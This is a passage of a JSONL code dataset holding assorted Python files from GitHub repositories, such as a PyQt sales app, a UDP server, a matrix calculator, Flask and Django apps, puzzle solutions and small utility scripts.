@pyqtSlot(name=\"show_http_customers_dialog\")\n    def show_http_customers_dialog(self):\n        \"\"\"\n        Slot for getCustomers triggered signal\n        \"\"\"\n        import_customers = GetCustomersHttpDialog(app,\n                                                  customers=self._customers,\n                                                  employees=self._employees,\n                                                  settings=self._settings)\n        import_customers.sig_done.connect(self.on_customers_done)\n        import_customers.exec_()\n\n    @pyqtSlot(name=\"show_http_products_dialog\")\n    def show_http_products_dialog(self):\n        \"\"\"\n        Slot for getProducts triggered signal\n        \"\"\"\n        import_product = GetProductsHttpDialog(app,\n                                               products=self._products,\n                                               settings=self._settings)\n        import_product.sig_done.connect(self.on_products_done)\n        import_product.exec_()\n\n    @pyqtSlot(name=\"show_visit_data_page\")\n    def show_visit_data_page(self):\n        \"\"\"\n        Slot for visitData triggered signal\n        \"\"\"\n        self.widgetCustomerInfo.setCurrentIndex(2)\n\n    @pyqtSlot(name=\"show_master_data_page\")\n    def show_master_data_page(self):\n        \"\"\"\n        Slot for masterData triggered signal\n        \"\"\"\n        self.widgetCustomerInfo.setCurrentIndex(0)\n\n    @pyqtSlot(name=\"show_reports_dialog\")\n    def show_reports_dialog(self):\n        \"\"\"\n        Slot for Report List triggered signal\n        \"\"\"\n        pass\n\n    @pyqtSlot(name=\"show_settings_dialog\")\n    def show_settings_dialog(self):\n        \"\"\"\n        Slot for settingsDialog triggered signal\n        \"\"\"\n        settings_dialog = SettingsDialog(self._settings, self._employees)\n        settings_dialog.settings_changed.connect(self.on_settings_changed)\n        settings_dialog.exec_()\n\n    @pyqtSlot(name=\"show_visit_dialog\")\n    def show_visit_dialog(self):\n        \"\"\"\n        Slot for launching the visit dialog\n        \"\"\"\n        try:\n            # do we have a report\n            _ = self._reports.report[\"rep_date\"]\n            active_report = True\n        except KeyError:\n            active_report = self.show_create_report_dialog()\n\n        if active_report:\n            self._reports.load_report(self.txtWorkdate.text())\n            try:\n                # do we have a customer\n                _ = self._customers.customer[\"company\"]\n            except KeyError:\n                msgbox = QMessageBox()\n                msgbox.information(self,\n                                   __appname__,\n                                   \"Ingen valgt kunde! \\nBesøg kan ikke oprettes.\",\n                                   QMessageBox.Ok)\n                return\n            # Launch the visit dialog\n            visit_dialog = VisitDialog(customers=self._customers,\n                                       employees=self._employees,\n                                       products=self._products,\n                                       reports=self._reports,\n                                       visits=self._visits)\n            if visit_dialog.exec_():\n                pass\n\n    @pyqtSlot(name=\"zero_database\")\n    def zero_database(self):\n        \"\"\"\n        Slot for zeroDatabase triggered signal\n        \"\"\"\n        self._contacts.recreate_table()\n        self._customers.recreate_table()\n        self._orderlines.recreate_table()\n        self._visits.recreate_table()\n        self._reports.recreate_table()\n\n        self.populate_contact_list()\n        self.populate_visit_details_list()\n        self.populate_visit_list()\n        self.populate_customer_list()\n\n        self._settings.setting[\"lsc\"] = \"\"\n        self._settings.setting[\"sac\"] = \"\"\n        self._settings.setting[\"lsp\"] = \"\"\n        self._settings.setting[\"sap\"] = \"\"\n        self._settings.update()\n        self.display_sync_status()\n\n        msgbox = QMessageBox()\n        msgbox.information(self, __appname__, \"Salgsdata er nulstillet!\", QMessageBox.Ok)\n\n\nif __name__ == '__main__':\n    app = QApplication(sys.argv)\n    # app.setAutoSipEnabled(True)\n    # app.setDesktopSettingsAware(True)\n    # app.setAttribute(Qt.AA_EnableHighDpiScaling)\n\n    pixmap = QPixmap(\":/splash/splash.png\")\n    splash = QSplashScreen(pixmap, Qt.WindowStaysOnTopHint)\n    splash.show()\n\n    app.processEvents()\n\n    window = MainWindow()\n    window.show()\n\n    QTimer.singleShot(1000, window.run)\n    splash.finish(window)\n\n    sys.exit(app.exec_())\n","repo_name":"fhdk/eordre2","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":28326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"33772644664","text":"# A branch from YogiSystemHub\n\nimport os\n\ndef sygcmd(command):\n\twin = ('nt', 'dos')\n\tif command == \"syg pyfunc version\":\n\t\tif os.name in win:\n\t\t\tos.system(\"python --version\")\n\t\telse:\n\t\t\tos.system(\"python3 --version\")\n\telif command == \"syg version\":\n\t\tprint(\"YogiSystem 1.0.0\")\n\telif command == \"borra\" or command == \"cancella\" or command == \"clear\" or command== \"borrado\":\n\t\tif os.name in win:\n\t\t\tos.system(\"cls\")\n\t\telse:\n\t\t\tos.system(\"clear\")\n\telif command == \"syg pyfunc python\" or command == \"syg pyfunc python3\":\n\t\tif os.name in win:\n\t\t\tos.system(\"python\")\n\t\telse:\n\t\t\tos.system(\"python3\")\n\telif command == \"syg pyfunc pip install library\":\n\t\tlibrary = input(\"\"\"\nQué librería desea descargar desde pip?\nYogiSystem Python Pip $ \"\"\")\n\t\ttry:\n\t\t\tos.system(f\"pip install {library}\")\n\t\texcept:\n\t\t\tif os.name == \"Linux\":\n\t\t\t\tos.system(\"sudo apt install python3-pip\")\n\t\t\telse:\n\t\t\t\treturn \"Lamentamos el error de no estar disponible pip\"\n\telif command == \"syg pyfunc pip uninstall library\":\n\t\tlibrary = input(\"\"\"\nQué librería desea desinstalar desde pip?\nYogiSystem Python Pip $ \"\"\")\n\t\tos.system(f\"pip uninstall {library}\")\n\t\t\t\n\n#comando = input(\"YogiSystem Python $ \")\n#sygcmd(comando)\n","repo_name":"Francesco091011/yogisystem","sub_path":"syg/sygpyfunc.py","file_name":"sygpyfunc.py","file_ext":"py","file_size_in_byte":1186,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"28965738405","text":"from socket import *\n\nserver = socket(AF_INET, SOCK_DGRAM)\nserver.bind((\"0.0.0.0\",8889))\nprint(\"waiting!\")\nwhile True:\n    data,addr = server.recvfrom(1024)\n    if not data:\n        break\n    print(\"Server receive message %s:%s\"%(data.decode(),addr))\n    server.sendto(b\"Thank for your msg!\",addr)\nserver.close()\n","repo_name":"mrliuminlong/note","sub_path":"socket/udp_server.py","file_name":"udp_server.py","file_ext":"py","file_size_in_byte":313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"24510581874","text":"import sys\r\nfrom timeit import default_timer as timer\r\nfrom zUtils.utils import *\r\nfrom queue import LifoQueue\r\n\r\ndata: list[str] = []\r\n\r\n# FILENAME FOR INPUT DATA\r\nINPUT_FILENAME: str = \"day10.txt\"\r\nBRACKET_MATCHES: dict[str, str] = {\r\n    '(': ')',\r\n    '[': ']',\r\n    '{': '}',\r\n    '<': '>'\r\n}\r\nERROR_SCORES: dict[str, int] = {\r\n    ')': 3,\r\n    ']': 57,\r\n    '}': 1197,\r\n    '>': 25137\r\n}\r\n\r\n\r\ndef validate(line: str, break_on_fail: bool = True) -> int:\r\n    error_score: int = 0\r\n    brackets: LifoQueue = LifoQueue()\r\n    for i in line:\r\n        if i in BRACKET_MATCHES:\r\n            # new open bracket\r\n            brackets.put(i)\r\n        else:\r\n            # close bracket\r\n            last: str = brackets.get()\r\n            if i != BRACKET_MATCHES[last]:\r\n                printDebug(f\"Expected {BRACKET_MATCHES[last]}, found {i}\")\r\n                error_score += ERROR_SCORES[i]\r\n                if break_on_fail:\r\n                    break\r\n\r\n    return error_score\r\n\r\n\r\n# INIT\r\n# Code for startup\r\nstart_time = timer()\r\ndata = advent_init(INPUT_FILENAME, sys.argv, clear_screen=False)\r\n\r\n# HERE WE GO\r\nerrors: List[int] = []\r\nfor line in data:\r\n    validation = validate(line)\r\n    if validation > 0:\r\n        errors.append(validation)\r\n\r\nprintGood(f\"Part 1 answer: {sum(errors)}\")\r\n\r\nprintOK(\"Time: %.5f seconds\" % (timer()-start_time))\r\n","repo_name":"ZachAttakk/adventofcode","sub_path":"2021/10-1.py","file_name":"10-1.py","file_ext":"py","file_size_in_byte":1353,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"27966677846","text":"import sys\n\ninputing = lambda : sys.stdin.readline().rstrip()\nwow = lambda : map(int,inputing().split())\none = lambda : int(inputing())\n\n# l = one()\n# n_list = list(wow())\n# nn_list = [n_list[0]]\n# a_list = list(wow())\n# aa_list = [a_list[0]]\n# for nn,aa in zip(n_list[1:],a_list[1:]):\n#     nn_list.append(nn_list[-1]+nn)\n#     aa_list.append(aa_list[-1]+aa)\n# cnt = \"none\"\n# for index in range(l):\n#     if nn_list[index] == aa_list[index]:\n#         cnt=index\n# print(0 if cnt == \"none\" else cnt+1)\n\n# for _ in range(one()):\n#     index,k,a =wow()\n#     n_list = []\n#     while a != 0:\n#         n_list.append(str(a%k))\n#         a//=k\n#     cnt = 0\n#     for i in n_list:\n#         cnt+=int(i)**2\n#     print(index,cnt)\n# index = 1\n# for _ in range(one()):\n#     r,l = wow()\n#     n_list = inputing()\n#     n_dict = {}\n#     for _ in range(r):\n#         a_list = inputing()\n#         for ll in range(l):\n#             if ll not in n_dict:\n#                 n_dict[ll]=[a_list[ll]]\n#             else:\n#                 n_dict[ll]+=[a_list[ll]]\n#     cnt = 0\n#     for i in range(l):\n#         if n_list[i] in n_dict[i]:\n#             pass\n#         else:\n#             cnt+=1\n#     if index != 1:\n#         print()\n#     print(f\"Data Set {index}:\")\n#     print(f\"{cnt}/{l}\")\n#     index+=1\n\n\n    \n    \n    \n    \n    ","repo_name":"WinterWhiteSnow/Python-Baekjoon","sub_path":"2022/9월/11.py","file_name":"11.py","file_ext":"py","file_size_in_byte":1360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
test_list = ls_fixture\n assert ls(pathname) == set(test_list) # noqa: C405\n\n\n@pytest.mark.xfail\ndef test_mk(mk_fixture):\n \"\"\"Testing mk command.\"\"\"\n filename, pre_exist, post_exist = mk_fixture\n assert os.path.isfile(filename) == pre_exist\n mk(filename)\n assert os.path.isfile(filename) == post_exist\n\n\n@pytest.mark.xfail\ndef test_rm(rm_fixture):\n \"\"\"Testing rm command.\"\"\"\n filename, pre_exist, post_exist = rm_fixture\n assert os.path.isfile(filename) == pre_exist\n rm(filename)\n assert os.path.isfile(filename) == post_exist\n\n\ndef test_contains(contains_fixture):\n \"\"\"Testing contains command.\"\"\"\n filename, status = contains_fixture\n assert contains(filename) == status\n\n\ndef test_since(since_fixture):\n \"\"\"Testing since command.\"\"\"\n path, date, test_list = since_fixture\n assert since(date, path) == set(test_list) # noqa: C405\n\n\ndef test_integration(integration_fixture):\n \"\"\"Testing integration command.\"\"\"\n comand, argument, code = integration_fixture\n format_str = 'python students/revyakinpetr/3/cli.py {0} {1}'\n comand_str = format_str.format(comand, argument)\n assert subprocess.call(comand_str, shell=True) == code # noqa: S602\n","repo_name":"sobolevn/itmo-2019","sub_path":"students/revyakinpetr/3/test_cli.py","file_name":"test_cli.py","file_ext":"py","file_size_in_byte":1393,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"22024031960","text":"from typing import List\n\nimport lab as B\nimport torch\nfrom lab import dispatch\nfrom plum import Union\n\n_Numeric = Union[B.Number, B.TorchNumeric]\n\n\n@dispatch\ndef polyval(coeffs: list, x: _Numeric) -> _Numeric: # type: ignore\n \"\"\"\n Computes the elementwise value of a polynomial.\n\n If `x` is a tensor and `coeffs` is a list if size n + 1, this function returns\n the value of the n-th order polynomial\n\n ..math:\n p(x) = coeffs[n-1] + coeffs[n-2] * x + ... 
+ coeffs[0] * x**(n-1)\n \"\"\"\n curVal = 0\n for i in range(len(coeffs) - 1):\n curVal = (curVal + coeffs[i]) * x\n\n return curVal + coeffs[-1]\n\n\n@dispatch\ndef from_numpy(\n a: B.TorchNumeric, b: Union[List, B.Number, B.NPNumeric, B.TorchNumeric]\n): # type: ignore\n \"\"\"\n Converts the array `b` to a tensor of the same backend as `a`\n \"\"\"\n return torch.tensor(b)\n","repo_name":"vdutor/SphericalHarmonics","sub_path":"src/spherical_harmonics/lab_extras/torch/extras.py","file_name":"extras.py","file_ext":"py","file_size_in_byte":867,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"53"} +{"seq_id":"5396474838","text":"from django.urls import path\nfrom .views import index, login, check, check_in, report, show, lbt, notice, api\n\nurlpatterns = [\n path('', index, name='index'),\n path('login/', login, name='login'),\n path('check/', check, name='check'),\n path('check_in/', check_in, name='check_in'),\n path('report/', report, name='report'),\n path('show/', show, name='show'),\n path('lbt/', lbt, name='lbt'),\n path('noticemanger/', notice, name='notice'),\n path('api/', api, name='api')\n]\n","repo_name":"jzab-nb/welcome_new_2022","sub_path":"back/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71729669287","text":"# -*- coding: utf-8 -*-\n\nimport os \nimport gensim\nfrom os import listdir\nfrom os.path import isfile, join\nfrom flask import request, Flask, render_template, jsonify\n\nimport model\n\nthesis_model = model.load_model()\n\ndir_path = os.path.dirname(os.path.realpath(__file__))\napp = Flask(__name__)\n\ndef process_file_name(filename):\n\treturn filename\n\n@app.route('/')\ndef compare_2():\n return render_template('index.html', page='compare_2')\n\n@app.route('/compare_all')\ndef compare_all():\n return render_template('index.html', page='compare_all')\n\n@app.route('/list_data')\ndef list_data():\n return render_template('index.html', page='list_data')\n\n@app.route('/api/data/list')\ndef api_data_list():\n\tdata_path = dir_path + '/data'\n\tonlyfiles = [f for f in listdir(data_path) if isfile(join(data_path, f))]\n\tonlyfiles = [f for f in onlyfiles]\n\n\treturn jsonify(onlyfiles)\n\n@app.route('/api/data/')\ndef api_data_get(filename):\n\tdata_path = dir_path + '/data/' + filename\n\tif not os.path.exists(data_path):\n\t\treturn 'Not found!'\n\n\twith open(data_path) as f:\n\t\treturn f.read()\n\n\n@app.route('/api/compare_2', methods=['POST'])\ndef api_compare_2():\n\tdata = request.get_json()\n\tif not 'doc1' in data or not 'doc2' in data:\n\t\treturn 'ERROR'\n\n\tvec1 = thesis_model.infer_vector(data['doc1'])\n\tvec2 = thesis_model.infer_vector(data['doc2'])\n\n\tvec1 = gensim.matutils.full2sparse(vec1)\n\tvec2 = gensim.matutils.full2sparse(vec2)\n\n\tprint (data)\n\tprint (vec2)\n\tprint (vec1)\n\n\treturn jsonify(sim=gensim.matutils.cossim(vec1, vec2))\n\n@app.route('/api/compare_all', methods=['POST'])\ndef api_compare_all():\n\tdata = request.get_json()\n\tif not 'doc' in data:\n\t\treturn 'ERROR'\n\n\tvec = thesis_model.infer_vector(data['doc'])\n\tres = thesis_model.docvecs.most_similar([vec], topn=5)\n\n\treturn jsonify(list=res)\n\n@app.route('/api/train_model')\ndef train_model():\n\tmodel.train_model()\n\treturn 'ok'\n\nif __name__ == '__main__':\n\tapp.run(host='0.0.0.0', port=8088, 
debug=True)\n","repo_name":"duyet/doc2vec-compare-doc-demo","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1953,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"14464217401","text":"import numpy\n\n\ndef first_matrix():\n a = []\n row = []\n n, m = input(\"Enter size of matrix:\").split()\n print(\"Enter matrix:\")\n for i in range(int(n)):\n line = input().split()\n for num in line:\n if \".\" in num:\n row.append(float(num))\n else:\n row.append(int(num))\n a.append(row)\n row = []\n return a\n\n\ndef second_matrix():\n b = []\n row_2 = []\n n_2, m_2 = input(\"Enter size of second matrix\").split()\n print(\"Enter second matrix:\")\n for i in range(int(n_2)):\n line = input().split()\n for num in line:\n if \".\" in num:\n row_2.append(float(num))\n else:\n row_2.append(int(num))\n b.append(row_2)\n row_2 = []\n return b\n\n\ndef add_matrix(a, b):\n if len(a) != len(b) or len(a[0]) != len(b[0]):\n print(\"This operation cannot be performed.\")\n else:\n result = [[a[x][y] + b[x][y] for y in range(len(a[0]))] for x in range(len(a))]\n return result\n\n\ndef mult_constant(a):\n factor = int(input(\"Enter constant:\"))\n result = [[a[x][y] * factor for y in range(len(a[0]))] for x in range(len(a))]\n return result\n\n\ndef mult_matrix(a, b):\n result = [[sum(x * y for x, y in zip(a_row, b_col)) for b_col in zip(*b)] for a_row in a]\n return result\n\n\ndef transpose(a):\n print(\"\"\"1. Main diagonal\n2. Side diagonal\n3. Vertical line\n4. Horizontal line\"\"\")\n choice = int(input(\"Your choice:\"))\n if choice == 1:\n result = [[a[x][y] for x in range(len(a))] for y in range(len(a[0]))]\n return result\n if choice == 2:\n result = [[a[x][y] for x in range(len(a))] for y in range(len(a[0]))]\n for line in result:\n line.reverse()\n result.reverse()\n return result\n if choice == 3:\n for line in a:\n line.reverse()\n return a\n if choice == 4:\n a.reverse()\n return a\n\n\ndef determinant(a):\n a = numpy.array(a)\n result = numpy.linalg.det(a)\n return result\n\n\ndef inverse(a):\n np = numpy.array(a)\n d = numpy.linalg.det(np)\n if d == 0:\n return \"This matrix doesn't have an inverse.\"\n return numpy.linalg.inv(np)\n\n\ndef start(command):\n if command == 1:\n a = first_matrix()\n b = second_matrix()\n return add_matrix(a, b)\n if command == 2:\n a = first_matrix()\n return mult_constant(a)\n if command == 3:\n a = first_matrix()\n b = second_matrix()\n return mult_matrix(a, b)\n if command == 4:\n a = first_matrix()\n return transpose(a)\n if command == 5:\n a = first_matrix()\n return determinant(a)\n if command == 6:\n a = first_matrix()\n return inverse(a)\n\n\nwhile True:\n print(\"\"\"1. Add matrices\n2. Multiply matrix by a constant\n3. Multiply matrices\n4. Transpose matrix\n5. Calculate a determinant\n6. Inverse matrix\n0. 
Exit\"\"\")\n action = int(input(\"Your choice:\"))\n if action == 0:\n break\n elif action == 5:\n det = start(action)\n print(\"The result is:\")\n print(int(round(det)))\n print()\n elif action == 6:\n inv = start(action)\n if type(inv) is str:\n print(inv)\n else:\n print(\"The result is:\")\n for r in inv:\n print(*r)\n print()\n else:\n matrix = start(action)\n print(\"The result is:\")\n for r in matrix:\n print(*r)\n print()\n","repo_name":"ryanwkeith/Numeric-Matrix-Processor","sub_path":"matrix_calc.py","file_name":"matrix_calc.py","file_ext":"py","file_size_in_byte":3519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27722119078","text":"#!/usr/bin/env python3\n\"\"\"\nSlice a datafile based on line number\n\"\"\"\nimport sys\nimport json\n\nimport pirail\n\ntry:\n filename = sys.argv[-1]\n split_line_no = int(sys.argv[-2])\nexcept IndexError:\n print(\"USAGE: %s [args] line_no data_file.json\" % sys.argv[0])\n sys.exit(1)\n\noutfile_name = filename.replace(\".json\", \"_%d.json\")\n\noutfile = None\n\nfor line_no, obj in pirail.read(filename):\n \n if outfile is None or line_no == split_line_no:\n if outfile is not None:\n outfile.close()\n outfile = open(outfile_name % line_no, \"w\")\n print(\"Writing %s\" % (outfile_name % line_no))\n\n outfile.write(json.dumps(obj)+\"\\n\")\n\noutfile.close()\n","repo_name":"cpn18/track-chart","sub_path":"desktop/slice_by_line.py","file_name":"slice_by_line.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"15066075315","text":"#from bs4 import BeautifulSoup\nimport matplotlib.pyplot as plt\nimport requests\nfrom selenium.webdriver.support.ui import WebDriverWait as wait\nfrom selenium import webdriver\nimport time\n\nurl = \"http://zzzscore.com/1to50/en/?ts=1586038059172\"\nchrome_driver = \"#### DRIVER PATH ####\"\n\ndef open_browser():\n driver = webdriver.Chrome(chrome_driver)\n driver.maximize_window()\n driver.get(url)\n time.sleep(0.8)\n\n #time.sleep(5)\n\n for i in range(2):\n list_box = driver.find_elements_by_class_name('grid')[0].find_elements_by_tag_name('div')\n list_values = []\n for box in list_box:\n print(box.text)\n list_values.append(int(box.text))\n print(list_values)\n sequence = sorted(range(len(list_values)), key=lambda k: list_values[k])\n print(sequence)\n for index in sequence:\n list_box[index].click()\n time.sleep(0.002)\n time.sleep(0.1)\n time.sleep(5)\nprint(open_browser())\n","repo_name":"Paradiddle131/1to50-Automation","sub_path":"screen_scrape.py","file_name":"screen_scrape.py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29307970918","text":"from flat import Bill, Flatmate\nfrom reports import PdfReport, FileSharer\n\na = int(input('Hey user,enter bill amount: '))\nb = input('Enter the period: ')\n\nc = input('Enter the first name of flatmate: ')\nd = int(input('Enter how much days first flatmate was at home: '))\n\ne = input('Enter the second name of flatmate: ')\nf = int(input('Enter how much days second flatmate was at home: '))\n\nthe_bill = Bill(amount=a, period=b)\nJohn = Flatmate(name=c, days_in_house=d)\nMarry = Flatmate(name=e, days_in_house=f)\nprint(f'{c} pays:', round(John.pays(bill=the_bill, flatmate2=Marry), 2))\nprint(f'{e} pays:', round(Marry.pays(bill=the_bill, flatmate2=John), 2))\n\npdf_report = 
PdfReport(filename=f'{the_bill.period}.pdf')\npdf_report.gererate(flatmate1=John, flatmate2=Marry, bill=the_bill)\n\nfile_sharer = FileSharer(filepath=pdf_report.filename)\n\nprint(file_sharer.share())\n","repo_name":"Mishania124/Flatmates_counter","sub_path":"flatmates_bill/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10826557364","text":"import glob\r\nimport os\r\nimport yaml\r\nimport xml.etree.ElementTree as ET\r\nimport xml.sax.saxutils\r\n\r\n# Define the directory where your YAML files are located\r\ndata_directory = 'plugins/AreaShop/regions/'\r\n\r\n# Initialize an empty dictionary to store the YAML contents\r\nyaml_objects = {}\r\n\r\n# Find all YAML files (.yml) in the data directory\r\nyaml_files = glob.glob(data_directory + '*.yml')\r\n\r\n# Iterate over the YAML files\r\nfor file_path in yaml_files:\r\n print(\"Processing file:\", file_path)\r\n with open(file_path, 'r') as file:\r\n yaml_data = yaml.safe_load(file)\r\n filename = os.path.basename(file_path)\r\n yaml_objects[filename] = yaml_data\r\n\r\n# Define the path for the output YAML file\r\noutput_file_yaml = 'combined.yml'\r\noutput_file_xml = 'combined.xml'\r\n\r\n# Write the combined YAML objects to the output YAML file\r\nwith open(output_file_yaml, 'w') as file:\r\n yaml.safe_dump(yaml_objects, file)\r\n\r\n# Convert the combined YAML objects to XML format\r\ndef convert_to_xml(element, data):\r\n if isinstance(data, dict):\r\n for key, value in data.items():\r\n sub_element = ET.SubElement(element, key)\r\n convert_to_xml(sub_element, value)\r\n elif isinstance(data, list):\r\n for i, item in enumerate(data, start=1):\r\n if isinstance(item, dict):\r\n sub_element = ET.SubElement(element, 'item', index=str(i))\r\n convert_to_xml(sub_element, item)\r\n else:\r\n sub_element = ET.SubElement(element, 'item', index=str(i))\r\n sub_element.text = xml.sax.saxutils.escape(str(item) if item is not None else '') # Convert None to empty string\r\n else:\r\n element.text = xml.sax.saxutils.escape(str(data) if data is not None else '') # Convert None to empty string\r\n\r\nroot = ET.Element('root')\r\nfor filename, yaml_data in yaml_objects.items():\r\n item = ET.SubElement(root, filename.split('.')[0])\r\n convert_to_xml(item, yaml_data)\r\n\r\n# Function to rename tags starting with numbers\r\ndef rename_tags_with_numbers(element):\r\n for child in list(element):\r\n if child.tag.isdigit():\r\n index = child.attrib.pop('index', None)\r\n new_tag = 'item_{}'.format(index) if index is not None else 'item'\r\n child.tag = new_tag\r\n rename_tags_with_numbers(child)\r\n else:\r\n rename_tags_with_numbers(child)\r\n\r\n# Create a new XML tree to perform tag renaming\r\nnew_root = ET.Element(root.tag)\r\nnew_root.extend(root)\r\nrename_tags_with_numbers(new_root)\r\n\r\n# Create an ElementTree object with the new XML tree\r\ntree = ET.ElementTree(new_root)\r\n\r\n# Write the XML data to the output XML file with pretty formatting\r\nwith open(output_file_xml, 'wb') as file:\r\n tree.write(file, encoding='utf-8', xml_declaration=True)\r\n\r\n# Read the XML data from the file and apply pretty formatting\r\nwith open(output_file_xml, 'r', encoding='utf-8') as file:\r\n xml_data = file.read()\r\n xml_data = xml_data.replace('><', '>\\n<')\r\n\r\n# Write the pretty-printed XML data to the output XML file\r\nwith open(output_file_xml, 'w', encoding='utf-8') as file:\r\n 
file.write(xml_data)\r\n","repo_name":"United-MC/data","sub_path":"mergeYamlAndConvert.py","file_name":"mergeYamlAndConvert.py","file_ext":"py","file_size_in_byte":3155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2231883629","text":"from __future__ import with_statement\n\nimport time\nimport RPi.GPIO as GPIO\n\nimport sys,os\nsys.path.append(os.getcwd())\n\nfrom utils.jk_util import *\nfrom utils.http_server import *\n\n# read config file\nmap = read_config(\"config.yaml\", \"IR_TRANSMITTER\")\n\nclass BuzzerServer(JKHttpHandler):\n def do_GET(self):\n params = parse_query_params(self)\n\n duration = float(params.get('duration')[0])\n gap = float(params.get('gap')[0])\n frequency = int(params.get('frequency')[0])\n times = int(params.get('times')[0])\n\n buzzer_beep(duration, gap, frequency, times)\n\n self._set_headers()\n self.wfile.write(\"Ok\")\n\n\ndef buzzer_beep(duration=0.1, gap=0.05, frequency=5000, times=2):\n BUZZER_GPIO_PIN = 26\n\n for x in range(0, times):\n GPIO.setmode(GPIO.BCM) # Numbers GPIOs by physical location\n GPIO.setup(BUZZER_GPIO_PIN, GPIO.OUT) # Set pins' mode is output\n # global Buzz # Assign a global variable to replace GPIO.PWM\n Buzz = GPIO.PWM(BUZZER_GPIO_PIN, 5000) # 440 is initial frequency.\n\n Buzz.start(50) # Start Buzzer pin with 50% duty ration\n\n time.sleep(duration)\n Buzz.stop() # Stop the buzzer\n GPIO.output(BUZZER_GPIO_PIN, 1) # Set Buzzer pin to High\n time.sleep(gap)\n\n\ndef buzzer_dual_beep():\n buzzer_beep(0.1)\n\n\nif __name__ == \"__main__\":\n run_http_server(handler_class=BuzzerServer, port=map.get(\"SERVER_PORT\"))\n","repo_name":"javedkansi/pi_home_automation","sub_path":"components/buzzer.py","file_name":"buzzer.py","file_ext":"py","file_size_in_byte":1445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19842493108","text":"import setuptools\n\nwith open(\"README.md\", \"r\", encoding=\"utf-8\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name=\"ppt_maker\",\n version=\"0.0.1\",\n author=\"Shuo Sun, Pengcheng Song\",\n author_email=\"smth_spc@hotmail.com\",\n description=\"Make PowerPoint slides with template and data\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/nyuspc/ppt_maker\",\n packages=setuptools.find_packages(),\n classifiers=[\n \"Programming Language :: Python\",\n \"Intended Audience :: Financial and Insurance Industry\",\n \"Topic :: Multimedia :: Graphics\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n ],\n)\n","repo_name":"nyuspc/ppt_maker","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32240471767","text":"from sys import stdin, stdout\nfrom itertools import permutations\n\nDOWN = 0\nRIGHT = 1\n\n\ndef solve2(board, change_limit, i=0, j=0, previous=None, change_count=0):\n if change_count > change_limit:\n return 0\n if i >= len(board) or j >= len(board):\n return 0\n if board[i][j] == \"H\":\n return 0\n if (i + 1, j + 1) == (len(board), len(board)):\n return 1\n\n return solve2(\n board,\n change_limit,\n i + 1,\n j,\n DOWN,\n change_count + 1 if previous != DOWN else change_count,\n ) + solve2(\n board,\n change_limit,\n i,\n j + 1,\n RIGHT,\n change_count + 1 if previous != RIGHT else change_count,\n 
)\n\n\ntestcase_count = int(stdin.readline())\n\nfor _ in range(testcase_count):\n    n, k = map(int, stdin.readline().split())\n    board = [list(stdin.readline().strip()) for _ in range(n)]\n\n    stdout.write(f\"{solve2(board, k + 1)}\\n\")\n","repo_name":"colding10/cp-notebook","sub_path":"solutions/usaco-contest/Past Contests/Walking Home/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":942,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"21190102473","text":"# -*- coding: utf-8 -*-\n\nfrom pgl import GWindow, GCompound, GOval, GLabel\nfrom EnigmaConstants import *\n\nclass EnigmaLamp(GCompound):\n    def __init__(self, letter):\n        GCompound.__init__(self)\n        \n        lamp = GOval(LAMP_RADIUS*2, LAMP_RADIUS*2)\n        lamp.setColor(LAMP_BORDER_COLOR)\n        lamp.setFillColor(LAMP_BGCOLOR)\n        self.add(lamp, -LAMP_RADIUS, -LAMP_RADIUS) # create design for lamps\n        \n        self.ch = GLabel(letter)\n        self.ch.setColor(LAMP_OFF_COLOR)\n        self.ch.setFont(LAMP_FONT)\n        self.add(self.ch, -self.ch.getWidth()/2, LAMP_LABEL_DY)\n        \n    def setState(self, state): # set state of lamp to be on or off\n        if state:\n            self.ch.setColor(LAMP_ON_COLOR)\n        else:\n            self.ch.setColor(LAMP_OFF_COLOR)\n        \n    def getState(self): # get state of lamp (on or off)\n        if self.ch.getColor() == LAMP_ON_COLOR:\n            return True\n        else: \n            return False\n","repo_name":"AriaKillebrewBruehl/CSCI121","sub_path":"Project4/EnigmaLamp.py","file_name":"EnigmaLamp.py","file_ext":"py","file_size_in_byte":988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17492917950","text":"import Demo\nimport sys\nimport traceback\nimport Ice\n\n# from calculator_ice import A\n\nif __name__ == '__main__':\n    communicator = None\n    try:\n        communicator = 